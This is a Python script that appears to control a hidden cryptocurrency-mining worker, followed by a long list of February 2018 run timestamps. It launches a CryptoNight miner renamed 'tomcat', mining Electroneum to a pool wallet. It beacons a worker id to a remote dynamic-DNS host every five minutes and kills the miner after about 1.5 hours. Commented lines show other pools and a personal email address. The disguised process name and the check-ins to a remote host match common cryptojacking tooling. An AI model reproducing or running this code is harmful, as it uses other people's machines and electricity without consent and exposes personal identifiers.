import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:06.559198
#2018-02-17 17:02:05.479631
#2018-02-17 18:49:05.774390
#2018-02-17 20:38:06.754635
#2018-02-17 22:24:05.523695
#2018-02-18 00:08:01.541194
#2018-02-18 01:58:05.576744
#2018-02-18 03:47:03.719013
#2018-02-18 05:33:05.515437
#2018-02-18 07:26:03.948919
#2018-02-18 09:12:07.466630
#2018-02-18 10:58:06.576965
#2018-02-18 12:46:06.752988
#2018-02-18 14:32:05.140669
#2018-02-18 16:22:06.120368
#2018-02-18 18:12:04.277039
#2018-02-18 19:59:02.146143
#2018-02-18 21:45:07.990111
#2018-02-18 23:34:01.379957
#2018-02-19 01:20:06.704307
#2018-02-19 03:08:05.543607
#2018-02-19 04:53:06.963856
#2018-02-19 06:40:08.140166
#2018-02-19 08:29:05.341843
#2018-02-19 10:18:07.668867
#2018-02-19 12:06:07.020828
#2018-02-19 13:54:05.578977
#2018-02-19 15:43:05.155862
#2018-02-19 17:29:08.060098
#2018-02-19 19:17:06.443376
#2018-02-19 21:04:01.831409
#2018-02-19 22:51:03.859161
#2018-02-20 00:35:02.066333
#2018-02-20 02:24:06.057464
#2018-02-20 04:14:06.340338
#2018-02-20 05:57:07.983180
#2018-02-20 07:44:07.214400
#2018-02-20 09:28:07.727739
#2018-02-20 11:12:01.760153
#2018-02-20 12:58:09.944587
#2018-02-20 14:43:06.230375
#2018-02-20 16:28:01.636093
#2018-02-20 18:17:01.537180
#2018-02-20 20:07:06.817122
#2018-02-20 21:54:03.583250
#2018-02-20 23:34:08.024251
#2018-02-21 01:17:07.309160
#2018-02-21 03:06:01.858742
#2018-02-21 04:53:07.050289
#2018-02-21 06:42:01.891478
#2018-02-21 08:29:04.080610
#2018-02-21 10:14:06.651984
#2018-02-21 12:03:02.258867
#2018-02-21 13:52:01.241974
#2018-02-21 15:38:05.687148
#2018-02-21 17:28:06.370093
#2018-02-21 19:15:07.235817
#2018-02-21 21:03:04.598296
#2018-02-21 22:49:05.129616
#2018-02-22 00:37:07.284291
#2018-02-22 02:24:01.822191
#2018-02-22 04:11:01.946719
#2018-02-22 05:56:08.031180
#2018-02-22 07:42:05.755179
#2018-02-22 09:29:07.821209
#2018-02-22 11:15:11.867141
#2018-02-22 13:01:09.797824
#2018-02-22 14:49:09.625255
#2018-02-22 16:36:09.600391
#2018-02-22 18:22:08.731329
#2018-02-22 20:14:04.950049
#2018-02-22 22:02:04.324323
#2018-02-22 23:48:07.093158
#2018-02-23 01:37:07.463129
#2018-02-23 03:23:05.696056
#2018-02-23 05:09:07.537954
#2018-02-23 06:53:07.401474
#2018-02-23 08:44:01.698925
#2018-02-23 11:02:01.326237
#2018-02-23 12:56:09.416832
#2018-02-23 14:42:06.000108
#2018-02-23 16:30:09.237725
#2018-02-23 18:16:03.711738
#2018-02-23 20:00:12.499769
#2018-02-23 21:44:06.449892
#2018-02-23 23:40:09.742765
#2018-02-24 01:31:01.896416
#2018-02-24 03:20:08.092221
#2018-02-24 05:06:04.032102
#2018-02-24 06:55:09.116273
#2018-02-24 08:45:02.945883
#2018-02-24 10:40:05.984896
#2018-02-24 12:25:08.416288
#2018-02-24 14:19:06.432640
#2018-02-24 16:06:06.745800
#2018-02-24 17:57:03.876310
#2018-02-24 19:44:05.273693
#2018-02-24 21:30:07.778936
#2018-02-25 00:15:01.440488
#2018-02-25 04:14:02.089186
#2018-02-25 07:46:01.720535